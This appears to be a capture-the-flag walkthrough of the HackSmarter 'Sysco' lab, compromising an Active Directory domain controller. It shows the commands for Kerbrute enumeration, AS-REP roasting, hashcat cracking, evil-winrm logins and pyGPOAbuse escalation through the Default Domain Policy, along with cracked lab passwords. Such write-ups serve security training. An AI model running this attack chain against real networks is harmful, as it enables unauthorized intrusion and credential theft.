HS-Sysco

,

HackSmarter Sysco - Complete Penetration Testing Walkthrough

Introduction

Welcome to this comprehensive penetration testing writeup for the Sysco machine from HackSmarter. This walkthrough demonstrates a full Active Directory exploitation chain, from initial reconnaissance to domain compromise. Throughout this engagement, I utilized various tools including Nmap, Kerbrute, Netexec, Hashcat, Evil-WinRM, and pyGPOAbuse to successfully compromise the target domain.

This writeup will guide you through each step of the penetration test, including service enumeration, user discovery, AS-REP roasting, credential spraying, email enumeration, privilege escalation via Group Policy Objects (GPO), and ultimately achieving Domain Administrator access.

Initial Reconnaissance

Nmap Scan Results

Starting with a comprehensive port scan to identify running services:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 126 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 126 Apache httpd 2.4.58 ((Win64) OpenSSL/3.1.3 PHP/8.2.12)
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
| http-methods: 
|   Supported Methods: POST OPTIONS HEAD GET TRACE
|_  Potentially risky methods: TRACE
|_http-favicon: Unknown favicon MD5: DD229045B1B32B2F2407609235A23238
|_http-title: Index - Sysco MSP
135/tcp   open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 126 Microsoft Windows
389/tcp   open  ldap          syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: SYSCO.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 126
464/tcp   open  kpasswd5?     syn-ack ttl 126
593/tcp   open  ncacn_http    syn-ack ttl 126 Microsoft Windows RPC
636/tcp   open  tcpwrapped    syn-ack ttl 126
3268/tcp  open  ldap          syn-ack ttl 126 Microsoft Windows Active Directory LDAP (Domain: SYSCO.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 126
3389/tcp  open  ms-wbt-server syn-ack ttl 126 Microsoft Terminal
| rdp-ntlm-info: 
|   Target_Name: SYSCO
|   NetBIOS_Domain_Name: SYSCO
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: SYSCO.LOCAL
|   DNS_Computer_Name: DC01.SYSCO.LOCAL
|   Product_Version: 10.0.20348
|_  System_Time: 2025-10-31T06:20:07+00:00
|_ssl-date: 2025-10-31T06:20:46+00:00; -1s from scanner time.
9389/tcp  open  mc-nmf        syn-ack ttl 126 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
49681/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
49743/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC
49816/tcp open  msrpc         syn-ack ttl 126 Microsoft Windows RPC

The scan reveals this is a Windows Domain Controller running Active Directory services. Key observations include:

  • DNS (Port 53) - Domain Name Service
  • HTTP (Port 80) - Web server running Apache
  • LDAP (Ports 389, 3268) - Active Directory services
  • SMB (Port 445) - File sharing
  • RDP (Port 3389) - Remote Desktop access
  • Domain: SYSCO.LOCAL
  • Computer Name: DC01

UDP Scan Results

1
2
3
4
5
6
7
8
9
10
11
12
13
14
panosoiko@parrot:~$ udpx -t 10.1.76.162        

        __  ______  ____ _  __
       / / / / __ \/ __ \ |/ /
      / / / / / / / /_/ /   / 
     / /_/ / /_/ / ____/   |  
     \____/_____/_/   /_/|_|  
         v1.0.7, by @nullt3r

2025/10/31 08:21:00 [+] Starting UDP scan on 1 target(s)
2025/10/31 08:21:04 [*] 10.1.76.162:53 (dns)
2025/10/31 08:21:08 [*] 10.1.76.162:123 (ntp)
2025/10/31 08:21:17 [*] 10.1.76.162:88 (kerberos)
2025/10/31 08:21:30 [+] Scan completed

The UDP scan confirms Kerberos (port 88) and NTP services are running.

Hosts File Configuration

Before proceeding, we need to add the domain and DC to our hosts file:

1
sudo nano /etc/hosts

Add the following entry:

1
10.1.76.162    dc01.sysco.local sysco.local

Web Enumeration

HTTP Service Analysis

The web server on port 80 hosts a generic corporate website for Sysco MSP. During enumeration, I discovered valuable information about potential usernames:

Potential Users Found on Website

Discovered potential usernames:

1
2
3
4
Greg.Shields
Sarah.Jhonson
Jack.Dowland
Lainey.Moore

Directory Fuzzing

Running Feroxbuster to discover hidden directories:

1
feroxbuster -u http://10.1.76.162/

The scan revealed a Roundcube webmail portal - an excellent target for credential-based attacks once we obtain valid credentials.

Roundcube Portal Discovery

Active Directory Enumeration

SMB Enumeration

Initial SMB enumeration revealed:

  • Null authentication is allowed
  • Cannot bruteforce RID
  • Cannot enumerate shares without credentials
  • Guest account is disabled

User Validation with Kerbrute

Using Kerbrute to validate the usernames discovered from the website:

1
kerbrute userenum -d sysco.local --dc dc01.sysco.local usernames.txt

Valid Users Confirmed

Three valid accounts confirmed:

  • Greg.Shields
  • Jack.Dowland
  • Lainey.Moore

Initial Access - AS-REP Roasting

AS-REP Roasting Attack

After attempting password spraying with usernames as passwords (unsuccessful), I proceeded with AS-REP roasting to identify accounts that don’t require Kerberos pre-authentication:

1
nxc ldap dc01.sysco.local -u names -p '' --asreproast output.txt

AS-REP Roasting Success

Success! We obtained a Kerberos AS-REP hash for Jack.Dowland.

Hash Cracking

Saving the hash to a file and cracking it with Hashcat:

1
hashcat hash /usr/share/wordlists/rockyou.txt

Hashcat automatically detected the hash type (AS-REP). If manual mode selection is needed, use -m 18200.

Cracked credentials:

1
Jack.Dowland:musicman1

Share Access Verification

Testing the credentials against SMB shares:

SMB Share Access

The credentials provide access to various shares, confirming their validity.

Bloodhound Analysis

Data Collection

Using Netexec to collect Bloodhound data:

1
netexec ldap dc01.sysco.local -u Jack.Dowland -p musicman1 --bloodhound --dns-server 10.1.76.162 -c ALL --dns-tcp

Attack Path Analysis

Clear Privilege Escalation Path

Key findings:

  • Jack.Dowland has no direct privilege escalation paths
  • Greg.Shields shows excellent potential as our next target
  • Greg.Shields has GenericAll permissions over the DEFAULT DOMAIN POLICY

This GenericAll permission is critical - it allows us to modify Group Policy Objects (GPO), which can lead to domain compromise.

Email Enumeration

Roundcube Access

Testing Jack.Dowland’s credentials on the Roundcube portal - successful login!

Email Investigation

Email Discovery

While reviewing Jack’s emails, I discovered a message sent to Lainey.Moore regarding a router configuration. The email contained a password hash.

Hash Cracking Round 2

1
hashcat hash /usr/share/wordlists/rockyou.txt

The hash cracked to: Chocolate1

Credential Validation

First, attempting to use the password for Lainey.Moore:

1
netexec smb dc01.sysco.local -u lainey.moore -p Chocolate1 --shares

WinRM Access Achieved

Success! Lainey.Moore is a member of the Remote Desktop Users group, granting us WinRM access.

Lateral Movement

WinRM Session

Establishing a WinRM session as Lainey.Moore:

1
evil-winrm -i dc01.sysco.local -u lainey.moore -p Chocolate1

Credential Discovery

Cleartext Password in LNK File

While enumerating the file system, I discovered a .lnk file containing cleartext credentials:

1
\Documents.-ssh netadmin@10.0.0.1 -pw 5y5coSmarter2025!!!

Discovered password: 5y5coSmarter2025!!!

Credential Spraying

The domain has only three users plus the Administrator account. Testing this password against Greg.Shields:

Greg.Shields Compromised

Successful authentication! We now have access to Greg.Shields’ account, which has GenericAll permissions over the Default Domain Policy.

Privilege Escalation via GPO Abuse

GPO Abuse Strategy

With GenericAll permissions on the Default Domain Policy GPO, we can abuse this to add a user to the local administrators group. I’ll use pyGPOAbuse to accomplish this.

Repository: https://github.com/Hackndo/pyGPOAbuse

Adding Administrative User

The following command adds a user named john (with password H4x00r123..) to the local administrators group:

1
python3 pygpoabuse.py 'sysco.local'/'greg.shields':'5y5coSmarter2025!!!' -gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9"

Group Policy Update

For the GPO changes to take effect, we need to force a Group Policy update. From our WinRM session as Lainey.Moore:

1
gpupdate

Group Policy Update

The Group Policy update successfully applies our malicious configuration.

Domain Compromise

Administrative Access

Now we can authenticate as the john user with local administrator privileges:

1
evil-winrm -i 10.1.76.162 -u john -p 'H4x00r123..'

With local administrator access, we can:

  • Access the Administrator’s home directory
  • Retrieve the root flag
  • Dump credentials from memory
  • Perform post-exploitation activities

Conclusion

This penetration test demonstrated a complete attack chain against an Active Directory environment:

  1. Reconnaissance - Service enumeration and username discovery
  2. Initial Access - AS-REP roasting to obtain credentials
  3. Enumeration - Email analysis leading to additional credentials
  4. Lateral Movement - Credential reuse across multiple accounts
  5. Privilege Escalation - GPO abuse via GenericAll permissions
  6. Domain Compromise - Local administrator access achieved